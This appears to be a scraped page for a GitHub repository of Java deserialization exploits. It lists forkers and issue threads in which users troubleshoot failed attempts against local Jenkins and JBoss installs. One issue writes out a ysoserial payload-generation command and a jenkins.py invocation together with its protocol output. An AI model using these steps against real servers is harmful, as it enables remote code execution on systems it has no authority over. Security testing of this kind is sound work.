javaunserializeexploits's People
Forkers
foxglovesec claudijd baiyunping333 binarygu sfilyh liu-yvan wkfl101 guozhimin kyodule ra0mb1er superqcheng phishing-factory amuntner cyber-forensic volt72 stonedeyy tuian oneroy shell-collection jijicanyu sanwenkit 00derp hellogitb akz747 brownbelt xbeark sireof exploit-inters victor0013 tom4t0 angrypapa ip-2014 mmg1 glira ultramangaia oneplus-x wupco msq2016 attackgithub nijats11 saraswat-mukherjee sts0mrg0 raystyle xizhimen warren-jace thenullthe pafh99 3453-315h scopion ru0ch3njavaunserializeexploits's Issues
License of the code
It would be nice to have an explicit license to know if the author is ok with reuse and the requirement for staying open-source. The license could be MIT for easy compatibility.
I reuse the exploits published in this repo for a scanner. I will use the same license.
https://github.com/GoSecure/break-fast-serial
fail to touch /tmp/pwned when using jenkins.py
I download the deb package of jenkins version 1.637 and install it in my Kali Linux.Then I start the service jenkins and check the status of jenkins.
I do the following exploit in the local:
Step One :
Use the tool - ysoserial to create the payload.
# java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'touch /tmp/pwned' > payload
Step Two:
# python jenkins.py localhost 8080 ../../payload
connecting to localhost port 39968
sending "Protocol:CLI-connect"
received "Welcome
"
received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
sending payload...
Then check the existing of /tmp/pwned.
But sadly, I don’t see this file.
Is there any problem when I do my exploit?
Failed to touch /tmp/pwned when using jboss-jmxinvoker-exploit.request
I set up jboss-6.1.0.Final, which is mentioned in your blog.
Then use Burp Repeater to forward the request file in your repo to 127.0.0.1:8080. The response tab is likely the same with the picture in your blog. However, I can't find the exist of /tmp/pwned, which is result of touch /tmp/pwned
. Is this request just a proof and this vulnerability cannot be exploit?
And another question, from the result of grep -R InvokerTransformer .
, the library version is 3.2, not 3.1 and not vulnerable. From README in ysoserial, ysoserial could not exploit this vulnerability.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.